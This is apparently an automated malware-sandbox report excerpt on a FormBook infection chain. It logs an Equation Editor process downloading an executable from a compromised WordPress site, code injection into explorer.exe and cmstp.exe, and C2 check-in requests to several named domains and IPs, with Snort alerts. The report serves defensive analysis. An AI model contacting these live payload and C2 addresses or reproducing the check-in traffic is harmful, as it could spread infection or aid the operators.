          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 103.150.181.71:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficDNS query: name: swamini.in
          Source: global trafficDNS query: name: www.allamericanshuttlellc.com
          Source: global trafficDNS query: name: www.shucaimh.com
          Source: global trafficDNS query: name: www.6061k.vip
          Source: global trafficDNS query: name: www.xazeyu.net
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 4x nop then pop edi7_2_00417CE2
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 4x nop then pop edi7_2_00417C85
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 4x nop then pop edi7_2_00416C9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi9_2_000A7C85
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi9_2_000A6C9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi9_2_000A7CE2
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.150.181.71 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.allamericanshuttlellc.com
          Source: C:\Windows\explorer.exeDomain query: www.6061k.vip
          Source: C:\Windows\explorer.exeDomain query: www.shucaimh.com
          Source: C:\Windows\explorer.exeDomain query: www.xazeyu.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.111.101 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49161 -> 103.224.247.210:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 107.164.111.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 3.33.130.190:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.guimisha.com/t2ti/
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1Host: www.shucaimh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1Host: www.6061k.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: swamini.in
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: swamini.inConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.use
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: word.exe, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
